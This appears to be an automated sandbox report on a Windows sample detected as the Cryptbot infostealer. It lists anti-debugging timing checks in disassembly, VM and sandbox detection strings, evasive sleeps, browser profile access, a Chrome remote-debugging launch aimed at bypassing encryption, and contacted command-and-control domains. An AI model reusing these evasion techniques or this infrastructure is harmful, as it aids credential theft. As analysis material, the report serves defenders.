Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81537 second address: 6F8156C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c jmp 00007F1CB4F7964Fh 0x00000011 mov eax, dword ptr [esi+34h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1CB4F79655h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8156C second address: 6F8157C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4FA4D1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8157C second address: 6F815AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+34h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1CB4F7964Dh 0x00000012 sub al, 00000046h 0x00000015 jmp 00007F1CB4F79651h 0x0000001a popfd 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F815AE second address: 6F815D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 test ecx, 00000700h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1CB4FA4D22h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F815D0 second address: 6F815D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F815D4 second address: 6F815DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F815DA second address: 6F81619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1CB4F7964Ch 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F1D22DF776Eh 0x00000014 jmp 00007F1CB4F79657h 0x00000019 or dword ptr [edx+38h], FFFFFFFFh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 movsx edi, ax 0x00000023 mov edi, eax 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81619 second address: 6F8161F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8161F second address: 6F81623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F81623 second address: 6F816C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c pushad 0x0000000d movsx edx, cx 0x00000010 pushfd 0x00000011 jmp 00007F1CB4FA4D26h 0x00000016 sub si, 2138h 0x0000001b jmp 00007F1CB4FA4D1Bh 0x00000020 popfd 0x00000021 popad 0x00000022 or dword ptr [edx+40h], FFFFFFFFh 0x00000026 jmp 00007F1CB4FA4D26h 0x0000002b pop esi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F1CB4FA4D1Dh 0x00000035 or cx, 6286h 0x0000003a jmp 00007F1CB4FA4D21h 0x0000003f popfd 0x00000040 pushfd 0x00000041 jmp 00007F1CB4FA4D20h 0x00000046 xor ax, 9D28h 0x0000004b jmp 00007F1CB4FA4D1Bh 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F816C2 second address: 6F816C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F816C7 second address: 6F816F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D25h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1CB4FA4D1Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB0BC1 second address: 6FB0BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4F7964Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FB0BD3 second address: 6FB0BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B76F39 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2429 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 882 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 863 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 895 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2408 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 851 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 887 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 2996 Thread sleep time: -88044s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5252 Thread sleep time: -4860429s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6684 Thread sleep time: -1764882s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5480 Thread sleep time: -1726863s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4628 Thread sleep time: -1790895s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6716 Thread sleep time: -4818408s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1060 Thread sleep time: -1702851s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6680 Thread sleep time: -1774887s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.4160769974.0000000000AC9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: chrome.exe, 00000004.00000002.4177722073.00001D4000060000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: chrome.exe, 00000004.00000002.4185929523.00001D4001234000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mousea@
Source: chrome.exe, 00000004.00000003.3368460550.00001D4001E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4187529016.00001D4002004000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ~]lx{tn~lzyqeMu{_tvwpd
Source: chrome.exe, 00000004.00000002.4184097439.00001D4000D68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ce added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=29b2f272-1dd1-478d-a50c-31f31090d6be
Source: file.exe Binary or memory string: Hyper-V RAW
Source: chrome.exe, 00000004.00000002.4184097439.00001D4000D68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=29b2f272-1dd1-478d-a50c-31f31090d6be
Source: file.exe, 00000000.00000002.4160769974.0000000000AC9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.4163006440.000000000145F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
Source: file.exe, 00000000.00000003.2197316136.000000000143D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2331644524.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4170206271.000001E299A5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.4160769974.0000000000AC9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2281972536.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2282246731.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2281972536.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2284121493.00000000014B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6456, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000000.00000003.2281972536.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2282246731.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2281972536.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2284121493.00000000014B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6456, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1561927 Sample: file.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 33 Suricata IDS alerts for network traffic 2->33 35 Found malware configuration 2->35 37 Antivirus detection for URL or domain 2->37 39 7 other signatures 2->39 7 file.exe 1 2->7         started        process3 dnsIp4 17 fvtekk5pn.top 34.116.198.130, 49730, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 7->17 19 127.0.0.1 unknown unknown 7->19 21 home.fvtekk5pn.top 7->21 41 Detected unpacking (changes PE section rights) 7->41 43 Attempt to bypass Chrome Application-Bound Encryption 7->43 45 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->45 47 5 other signatures 7->47 11 chrome.exe 1 7->11         started        signatures5 process6 dnsIp7 23 192.168.2.4, 443, 49730, 49731 unknown unknown 11->23 25 239.255.255.250 unknown Reserved 11->25 14 chrome.exe 11->14         started        process8 dnsIp9 27 www.google.com 142.250.181.68 GOOGLEUS United States 14->27 29 plus.l.google.com 172.217.17.78 GOOGLEUS United States 14->29 31 2 other IPs or domains 14->31
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.217.19.206
 play.google.com United States
15169 GOOGLEUS false
172.217.17.78
 plus.l.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
142.250.181.68
 www.google.com United States
15169 GOOGLEUS false

Private

IP
192.168.2.4
127.0.0.1

Contacted Domains

Name IP Active
home.fvtekk5pn.top 34.116.198.130 true
plus.l.google.com 172.217.17.78 true
play.google.com 172.217.19.206 true
www.google.com 142.250.181.68 true
fvtekk5pn.top 34.116.198.130 true
apis.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
.1.1home.fvtekk5pn.top true
  • Avira URL Cloud: malware
 unknown
http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
    		high
    analforeverlovyu.top false
      		high
      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
        		high
        https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
          		high
          llowfvtekk5pn.top true
          • Avira URL Cloud: safe
          		 unknown
          home.fvtekk5pn.top false
            		high